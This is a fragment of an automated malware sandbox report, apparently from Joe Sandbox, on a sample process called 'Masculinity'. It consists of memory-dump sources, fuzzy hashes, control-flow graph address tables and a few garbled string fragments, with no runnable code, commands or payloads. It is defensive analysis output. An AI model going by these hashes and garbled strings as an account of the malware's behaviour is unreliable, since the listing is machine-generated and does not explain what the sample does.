                                              • Instruction ID: bd29fb1847542150b6b2c9bc43f704c1521f086bf358670bd7f993abfd5edd60
                                              • Opcode Fuzzy Hash: 4dfca20b0cab7397807809e23e76d30d76a2181f52686d8df3b1aa7d707f51c6
                                              • Instruction Fuzzy Hash: 9CC1B475E01218CFDB14DFA9C954B9DBBB2BF89300F1080A9D809AB365DB356E85CF50
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.3275368155.0000000004A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A60000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_4a60000_Masculinity.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d2198ed4fc234d04a8357e3a6c5db7caa4a4818a7eb32cbc479e641b2f5404b5
                                              • Instruction ID: c1bec42cb69b48b27ef906f00db6b01a05c59d5e45d13be79368532c1c17dd2c
                                              • Opcode Fuzzy Hash: d2198ed4fc234d04a8357e3a6c5db7caa4a4818a7eb32cbc479e641b2f5404b5
                                              • Instruction Fuzzy Hash: 58C1B475E01218CFDB14DFA9C944B9DBBB2BF89304F1080A9D809AB365DB355E85CF50
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.3275368155.0000000004A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A60000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_4a60000_Masculinity.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3da14e1460f99f0dbfcc0ae38dce8dcdbd5fd7ba992f5c056bf11e2c0bd82f43
                                              • Instruction ID: f29cb1dd13ca955734ab12a577ba2e416356378825392249919f83664c1aa73f
                                              • Opcode Fuzzy Hash: 3da14e1460f99f0dbfcc0ae38dce8dcdbd5fd7ba992f5c056bf11e2c0bd82f43
                                              • Instruction Fuzzy Hash: 92A10670D00208CFEB14EFA9D944BDDBBB1FF88315F20826AE409AB2A1DB755985CF55
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.3276010631.0000000004E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E80000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_4e80000_Masculinity.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f96325d1fde162a1b7a3e1e86a8ea50b7e3b1111628b3674fa887008e629ad3d
                                              • Instruction ID: 9d750296441dafd519f292238d859d039249b4888f639a588bf9c72a6443b0f1
                                              • Opcode Fuzzy Hash: f96325d1fde162a1b7a3e1e86a8ea50b7e3b1111628b3674fa887008e629ad3d
                                              • Instruction Fuzzy Hash: 69A19275E012298FEB68DF6AC944B9DFBF2BB88300F14D1A9D40CA7255EB345A85CF11
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.3276010631.0000000004E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E80000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_4e80000_Masculinity.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 45f2b9eb0012a94e374a2c401355670a46c338ad0b29041abb75aba7122ba5e8
                                              • Instruction ID: 552613de7ae0c9b85ebd1034c51edf422fadf9b2eec60417937ec9e034c9b1d0
                                              • Opcode Fuzzy Hash: 45f2b9eb0012a94e374a2c401355670a46c338ad0b29041abb75aba7122ba5e8
                                              • Instruction Fuzzy Hash: 74A19275E012188FEB68DF6AC944B9DFBF2AF88300F14D1AAD40DA7254EB345A85CF11
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.3276010631.0000000004E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E80000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_4e80000_Masculinity.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f4bef52f90016d5c5c43cc418133ff92e8d4772f395ba5b43ceb896eabf33178
                                              • Instruction ID: 1dd72183d5733e24204e8090948e44df7989c7f5647f6b72d27f930efc807775
                                              • Opcode Fuzzy Hash: f4bef52f90016d5c5c43cc418133ff92e8d4772f395ba5b43ceb896eabf33178
                                              • Instruction Fuzzy Hash: 9BA1A174E012198FEB68DF6AC944B9DBBF2AF88300F14D1E9D50DA7254EB345A85CF10
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.3276010631.0000000004E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E80000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_4e80000_Masculinity.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3c8f66831123311fbd881975898dda685de443fa269e0e3333da11f17e3d5bfc
                                              • Instruction ID: b6ff19063390f2f3491d3e1fc533ea9bdf40c0ff988a9148dc9e65f1635b4938
                                              • Opcode Fuzzy Hash: 3c8f66831123311fbd881975898dda685de443fa269e0e3333da11f17e3d5bfc
                                              • Instruction Fuzzy Hash: 26A1A374E012198FEB68DF6AC944B9DBBF2AB88300F14D1EAD50CA7254EB745A85CF11
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.3276010631.0000000004E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E80000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_4e80000_Masculinity.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9af535b99804131f177053c375e68e1c60509f269b1117ff1105949bc4af5593
                                              • Instruction ID: 705c38190d62e5ab5708285a18516679acd803a7ed15db26d18e2107d8004b32
                                              • Opcode Fuzzy Hash: 9af535b99804131f177053c375e68e1c60509f269b1117ff1105949bc4af5593
                                              • Instruction Fuzzy Hash: 1BA1A474E012198FEB64DF6AC944B9DBBF2BF89300F14D1A9D80CA7254EB355A85CF11
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.3276010631.0000000004E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E80000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_4e80000_Masculinity.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: eaccecdd992cd07029dfce2ba331e529387526a5633042e036754c5fee2cbfb6
                                              • Instruction ID: 9dde97876e427d561212d817bc2b23a643bb293142258f34e32b7cdf78656cf8
                                              • Opcode Fuzzy Hash: eaccecdd992cd07029dfce2ba331e529387526a5633042e036754c5fee2cbfb6
                                              • Instruction Fuzzy Hash: CCA1A174E012188FEB68DF6AC944B9DBBF2AF88300F14D1A9D80CA7254EB755A85CF11
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.3276010631.0000000004E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E80000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_4e80000_Masculinity.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 55daa61e587a13ce2e1f83074ddd4c374c303d9631758d33b2201069e3702955
                                              • Instruction ID: 108e51622ffe46b164db8f3ad17b3baee1c377d4c847efe5b5b5ec739a5daa62
                                              • Opcode Fuzzy Hash: 55daa61e587a13ce2e1f83074ddd4c374c303d9631758d33b2201069e3702955
                                              • Instruction Fuzzy Hash: 7BA19074E012298FEB68DF6AC944B9DFBF2AF88300F14D1A9D44DA7254EB345A85CF11
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.3275368155.0000000004A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A60000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_4a60000_Masculinity.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e889194ab465cb06705dc35b9e762e220b1a7aaee7ce1ac3ca9e7225662310b5
                                              • Instruction ID: ae987707d2846d93943d43794cc2f2345afe5b7c02d35f2b03a4651324fbccfe
                                              • Opcode Fuzzy Hash: e889194ab465cb06705dc35b9e762e220b1a7aaee7ce1ac3ca9e7225662310b5
                                              • Instruction Fuzzy Hash: EBA1F771D00208CFEB14DFA9D984BDDBBB1FF88305F208269E409AB2A1DB755985CF55
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.3275505143.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_4ab0000_Masculinity.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 033a5392100187220476487ec6c8bab5e918cbd9e65af0e199fdacab3e2bec4d
                                              • Instruction ID: 16d4e2d49b5d576d56632283e46eaa919d9d423017a202b16f2346bb46513c76
                                              • Opcode Fuzzy Hash: 033a5392100187220476487ec6c8bab5e918cbd9e65af0e199fdacab3e2bec4d
                                              • Instruction Fuzzy Hash: 0F51AF72D056089BEB15DFBDD4926DDFBB2EB88310F00C02AC9546BAA5DB319843CF52
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.3275368155.0000000004A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A60000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_4a60000_Masculinity.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0776e93ab0b2f185d46318b1fd862066774ccf35b0d440354162a80de9a60b34
                                              • Instruction ID: 7bf30b991f140f46e1e8144a6a6f6bd1b8d523a300952b3a0bdade6a6f70dfe6
                                              • Opcode Fuzzy Hash: 0776e93ab0b2f185d46318b1fd862066774ccf35b0d440354162a80de9a60b34
                                              • Instruction Fuzzy Hash: 82910670D00208CFEB10DFA8D984BDDBBB1FF49311F2092A9E409AB2A1DB759985CF15
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.3275851951.0000000004E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E00000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_4e00000_Masculinity.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 53850eb176a85d4629e52ad618c5d6fe9fa0fe6a08ccb9c63a2096a907c5b75e
                                              • Instruction ID: 227c3090f87d211e0915558afb8920c22f8a8d9c89391033079d9cfb6fa5dd1d
                                              • Opcode Fuzzy Hash: 53850eb176a85d4629e52ad618c5d6fe9fa0fe6a08ccb9c63a2096a907c5b75e
                                              • Instruction Fuzzy Hash: C081D675E00218CFDB14DFA9C980AEEBBB2FF88304F608169D815AB394DB756995CF50
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.3275851951.0000000004E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E00000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_4e00000_Masculinity.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7b61fb48414bc8d4bbf9fccf07acd85f940981a28174f041baa6b1d61a0809a2
                                              • Instruction ID: de67d26cc5c1fdf090abbf523380644102d2ef029ad9a718febbd193b571a3e5
                                              • Opcode Fuzzy Hash: 7b61fb48414bc8d4bbf9fccf07acd85f940981a28174f041baa6b1d61a0809a2
                                              • Instruction Fuzzy Hash: 7A81C675E00219CFDB14DFA9C990AEEBBB2FF88304F208169D815AB394DB356995CF50
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.3275851951.0000000004E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E00000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_4e00000_Masculinity.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c1b6bda03743a284c22ff744c477d1fd1e4609a82ae81453f77a99124777d20a
                                              • Instruction ID: 63b6f855136596a1c08081bc59212fe65fe4a47c40aef920d537f486f4ade32f
                                              • Opcode Fuzzy Hash: c1b6bda03743a284c22ff744c477d1fd1e4609a82ae81453f77a99124777d20a
                                              • Instruction Fuzzy Hash: F881D475E00219CFDB14DFA9C980ADEBBB2FF88304F208469D815AB394DB756996CF50
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.3275794292.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_4df0000_Masculinity.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3ee6b89aac511a589ace2440853508fc4c1fdb571a504fae264b8be87e83c892
                                              • Instruction ID: a57336db56237671f70048a59f37b07a0f4d84aac5f0752ba5c0c6a26ac7431c
                                              • Opcode Fuzzy Hash: 3ee6b89aac511a589ace2440853508fc4c1fdb571a504fae264b8be87e83c892
                                              • Instruction Fuzzy Hash: 1781B375E00219CFDB14DFA9C980ADEBBB2FF88304F608569D815AB354DB35A946CF50
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.3276010631.0000000004E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E80000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_4e80000_Masculinity.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 11ee6e47ffb5d2424024e0bf66ada52023955abe51ae464a6d37a96c57e08d4a
                                              • Instruction ID: 9a74242e6e1b36317ca95a8157e5a32655acaa884b22a677312e419c2fe1d0d5
                                              • Opcode Fuzzy Hash: 11ee6e47ffb5d2424024e0bf66ada52023955abe51ae464a6d37a96c57e08d4a
                                              • Instruction Fuzzy Hash: C881A5B1E016198FEB28CF6AC944B9EBAF2BF88300F14C1A9D40DA7254DB745A858F10
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.3276010631.0000000004E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E80000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_4e80000_Masculinity.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: fd3a00dc6fad7e8868b832a44a195f07f17ba1744ab890c44a512ef34f677b35
                                              • Instruction ID: 2f7f6400f8f290f47de5ffc041bd28e4f0cd6f9b40504a7f268af03c1c8b1a46
                                              • Opcode Fuzzy Hash: fd3a00dc6fad7e8868b832a44a195f07f17ba1744ab890c44a512ef34f677b35
                                              • Instruction Fuzzy Hash: F2718375E016298FEB28DF6AC944B9EFAF2BF88300F14C1A9D40DA7254DB745A858F10
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.3271868483.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_150000_Masculinity.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 92870007fb7fd86b693fd8918e9c8ee6f09f7e3df39efe394c60ef27af60b632
                                              • Instruction ID: 447915dec2a43f49e08ee80218a8bb73050e33e28b60bd542bf5d3bec2ff3985
                                              • Opcode Fuzzy Hash: 92870007fb7fd86b693fd8918e9c8ee6f09f7e3df39efe394c60ef27af60b632
                                              • Instruction Fuzzy Hash: D151A674E01219DFDB18DFAAD984A9DBBF2BF89300F24D02AE815AB364DB345945CF14
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.3271868483.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_150000_Masculinity.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 82fbf684b484ed2bfcfa382c96a230451341c151de544c8efbd9e6bfa9bce551
                                              • Instruction ID: 180e154e9228978c027a47b13773d55d317b844d7ce8dea2a195354f6a268134
                                              • Opcode Fuzzy Hash: 82fbf684b484ed2bfcfa382c96a230451341c151de544c8efbd9e6bfa9bce551
                                              • Instruction Fuzzy Hash: 5D51A774E00219DFDB18DFAAD894A9DBBF2BF89300F24D02AE815AB364DB345945CF54
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.3275505143.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_4ab0000_Masculinity.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 41a894c77e9f5d6392f4f983e4652addc7597e45e0522e8684df7a95b0ecc0fc
                                              • Instruction ID: 6734d58965d5f965b4c65b03db774e12eed59b003198435a2e8802fdc285a462
                                              • Opcode Fuzzy Hash: 41a894c77e9f5d6392f4f983e4652addc7597e45e0522e8684df7a95b0ecc0fc
                                              • Instruction Fuzzy Hash: BF4102B0E012088FEB18DFAAC9447DEBBF2AF88304F24C069C458BB295DB755946CF54
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.3276010631.0000000004E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E80000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_4e80000_Masculinity.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: fe6ca2c8323f077f291bb02f56bfc579252b65fecd240d8d04487591b4c1b7bd
                                              • Instruction ID: deeb02116e159976f4295c2fedd23b5bf2c60d17686d527fa85bd8b8d0fcb4e6
                                              • Opcode Fuzzy Hash: fe6ca2c8323f077f291bb02f56bfc579252b65fecd240d8d04487591b4c1b7bd
                                              • Instruction Fuzzy Hash: B4517971E016198BEB28CF5BC9447DEFAF3AFC8204F14C1A9C40DA6254EB744A868F51
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.3276010631.0000000004E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E80000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_4e80000_Masculinity.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c1022e5c714627038ebd71ce19c89ae4e1f0e681bfd9d85a3841c9036bf9bd4e
                                              • Instruction ID: 2d66681c6018661081266a7216f348b1e3cbf84b0f6ddf6e606905bf5fd61bdd
                                              • Opcode Fuzzy Hash: c1022e5c714627038ebd71ce19c89ae4e1f0e681bfd9d85a3841c9036bf9bd4e
                                              • Instruction Fuzzy Hash: FD417B71E016598BEB28CF5BD9447DEFAF3AFC9304F14C1A9C50CA6264DB740A858F51
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.3276010631.0000000004E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E80000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_4e80000_Masculinity.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 939c8b12afe7eb9837e595d9e8553c6f8e422d603e93b7bb4d8d75e04e8f27f1
                                              • Instruction ID: 540b038c06364435170bf477379c73878db81b4f9e534d12cd76c464e748e507
                                              • Opcode Fuzzy Hash: 939c8b12afe7eb9837e595d9e8553c6f8e422d603e93b7bb4d8d75e04e8f27f1
                                              • Instruction Fuzzy Hash: D5415A71E016198BEB58CF5BD9447DEFAF3AFC9300F14C1A9C40DA6264DB740A868F51
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.3276010631.0000000004E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E80000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_4e80000_Masculinity.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 362cecf5376a3803e8df1db9d8645af21d81b62a67e57110d2c8bdfc056d238a
                                              • Instruction ID: 3269d9960301cdb9e3e94d9aaabfcfba9c5c87ed51d64a2bd0c279f234c80cb0
                                              • Opcode Fuzzy Hash: 362cecf5376a3803e8df1db9d8645af21d81b62a67e57110d2c8bdfc056d238a
                                              • Instruction Fuzzy Hash: 45417A71E016588BEB68CF6BC9447DEFAF3AFC9304F14C1A9C40DA6264EB750A858F51
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.3276010631.0000000004E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E80000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_4e80000_Masculinity.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c84db8d822dcea209ace6451d1e33f1e11cebe60a2bb1e90d3222ee5f782b6c4
                                              • Instruction ID: cb35ca285bc7919472cd18ece41dcc6a09b5ee55e508f6b483a4f862a22ff4b2
                                              • Opcode Fuzzy Hash: c84db8d822dcea209ace6451d1e33f1e11cebe60a2bb1e90d3222ee5f782b6c4
                                              • Instruction Fuzzy Hash: C2416A71E016598BEB28CF6BC9447DEFAF3AFC9300F14C1AAC50CA6264DB750A858F51
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.3275851951.0000000004E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E00000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_4e00000_Masculinity.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7004c304f488a4b19a77a549a927e99e83518da5b0c9e7d725353c683ea62a14
                                              • Instruction ID: 0420bdf92d22686428e7a7a3e9bcc30c1f1f273e38fdc474eb60f124bd53a215
                                              • Opcode Fuzzy Hash: 7004c304f488a4b19a77a549a927e99e83518da5b0c9e7d725353c683ea62a14
                                              • Instruction Fuzzy Hash: 80410474E002588BEB18DFAAD9546DEFBF2BF89304F14D06AC419AB254EB355946CF40
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.3275851951.0000000004E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E00000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_4e00000_Masculinity.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e0a28df936e3c0806742a711b5a27bd2f57ea6e0471a5b90f46edef538dde17b
                                              • Instruction ID: b6b935c42b3f8641884add31ff93b40453d41cd6bd6a66daab96f65d9f8ff167
                                              • Opcode Fuzzy Hash: e0a28df936e3c0806742a711b5a27bd2f57ea6e0471a5b90f46edef538dde17b
                                              • Instruction Fuzzy Hash: AB310474E002488BEB18DFAAD9406EEFBF2AF89304F14D12AC419BB294DB745946CF50

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 0 1576f1-157725 1 157b54-157b58 0->1 2 15772b-15774e 0->2 3 157b71-157b7f 1->3 4 157b5a-157b6e 1->4 11 157754-157761 2->11 12 1577fc-157800 2->12 9 157b81-157b96 3->9 10 157bf0-157c05 3->10 18 157b9d-157baa 9->18 19 157b98-157b9b 9->19 20 157c07-157c0a 10->20 21 157c0c-157c19 10->21 24 157770 11->24 25 157763-15776e 11->25 15 157802-157810 12->15 16 157848-157851 12->16 15->16 36 157812-15782d 15->36 22 157c67 16->22 23 157857-157861 16->23 26 157bac-157bed 18->26 19->26 27 157c1b-157c56 20->27 21->27 30 157c6c-157c9c 22->30 23->1 28 157867-157870 23->28 31 157772-157774 24->31 25->31 75 157c5d-157c64 27->75 34 157872-157877 28->34 35 15787f-15788b 28->35 59 157cb5-157cbc 30->59 60 157c9e-157cb4 30->60 31->12 39 15777a-1577dc 31->39 34->35 35->30 37 157891-157897 35->37 57 15782f-157839 36->57 58 15783b 36->58 42 15789d-1578ad 37->42 43 157b3e-157b42 37->43 87 1577e2-1577f9 39->87 88 1577de 39->88 55 1578c1-1578c3 42->55 56 1578af-1578bf 42->56 43->22 46 157b48-157b4e 43->46 46->1 46->28 62 1578c6-1578cc 55->62 56->62 63 15783d-15783f 57->63 58->63 62->43 69 1578d2-1578e1 62->69 63->16 70 157841 63->70 72 1578e7 69->72 73 15798f-1579ba call 157538 * 2 69->73 70->16 77 1578ea-1578fb 72->77 92 157aa4-157abe 73->92 93 1579c0-1579c4 73->93 77->30 79 157901-157913 77->79 79->30 82 157919-157931 79->82 144 157933 call 1580c9 82->144 145 157933 call 1580d8 82->145 85 157939-157949 85->43 86 15794f-157952 85->86 90 157954-15795a 86->90 91 15795c-15795f 86->91 87->12 88->87 90->91 95 157965-157968 90->95 91->22 91->95 92->1 111 157ac4-157ac8 92->111 93->43 94 1579ca-1579ce 93->94 98 1579f6-1579fc 94->98 99 1579d0-1579dd 94->99 100 157970-157973 95->100 101 15796a-15796e 95->101 103 157a37-157a3d 98->103 104 1579fe-157a02 98->104 114 1579ec 99->114 115 1579df-1579ea 99->115 100->22 102 157979-15797d 100->102 101->100 101->102 102->22 109 157983-157989 102->109 106 157a3f-157a43 103->106 107 157a49-157a4f 103->107 104->103 110 157a04-157a0d 104->110 106->75 106->107 112 157a51-157a55 107->112 113 157a5b-157a5d 107->113 109->73 109->77 116 157a1c-157a32 110->116 117 157a0f-157a14 110->117 118 157b04-157b08 111->118 119 157aca-157ad4 call 1563e0 111->119 112->43 112->113 120 157a92-157a94 113->120 121 157a5f-157a68 113->121 122 1579ee-1579f0 114->122 115->122 116->43 117->116 118->75 124 157b0e-157b12 118->124 119->118 132 157ad6-157aeb 119->132 120->43 129 157a9a-157aa1 120->129 127 157a77-157a8d 121->127 128 157a6a-157a6f 121->128 122->43 122->98 124->75 130 157b18-157b25 124->130 127->43 128->127 135 157b34 130->135 136 157b27-157b32 130->136 132->118 141 157aed-157b02 132->141 138 157b36-157b38 135->138 136->138 138->43 138->75 141->1 141->118 144->85 145->85
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.3271868483.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_150000_Masculinity.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: (ocq$(ocq$(ocq$(ocq$(ocq$(ocq$,gq$,gq
                                              • API String ID: 0-3338910979
                                              • Opcode ID: 4186a7ff03db60dbd8fb2fe883719f95a18e8155c74d656fd8c398d646ae3ba1
                                              • Instruction ID: 20e7e603af68a88eb5288047d2609992c73585554a081b9e1eaab975f5ee7ca3
                                              • Opcode Fuzzy Hash: 4186a7ff03db60dbd8fb2fe883719f95a18e8155c74d656fd8c398d646ae3ba1
                                              • Instruction Fuzzy Hash: 72127D30A04205CFCB15CF68E885AAEBBF2FF49315F258599E869DB2A1D730ED45CB50

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 243 150ca0-150cc0 244 150cc7-15105f call 150780 * 14 243->244 245 150cc2 243->245 443 151062 call 152790 244->443 444 151062 call 1527f0 244->444 245->244 324 151068-15107d 446 151080 call 1529d0 324->446 447 151080 call 1529e0 324->447 448 151080 call 153c90 324->448 449 151080 call 153cc0 324->449 450 151080 call 152a69 324->450 326 151086-15108f 451 151092 call 154285 326->451 452 151092 call 1541a0 326->452 327 151098-1516eb call 155362 call 15c19b call 15c468 call 15c738 call 15ca08 call 15cff8 call 15d2cd call 15d599 call 155362 call 15d869 * 16 410 1516f1-1517aa 327->410 443->324 444->324 446->326 447->326 448->326 449->326 450->326 451->327 452->327
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.3271868483.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_150000_Masculinity.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: & $,! L! p! $LRcq$`- $h $'
                                              • API String ID: 0-2716815112
                                              • Opcode ID: a63d60d6b5e187e802aba132d0d35ccdc0d3f10bb121622ed528232fda183ca7
                                              • Instruction ID: 263197d24df9171a06175a68fdd2adf441299571c866f4e59c32fb2ca23d962c
                                              • Opcode Fuzzy Hash: a63d60d6b5e187e802aba132d0d35ccdc0d3f10bb121622ed528232fda183ca7
                                              • Instruction Fuzzy Hash: DC521D75A40A5ACFCB54DF24DD94A8EBBB2FB48301F5085A5E40EA7365DB342E85CF80

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
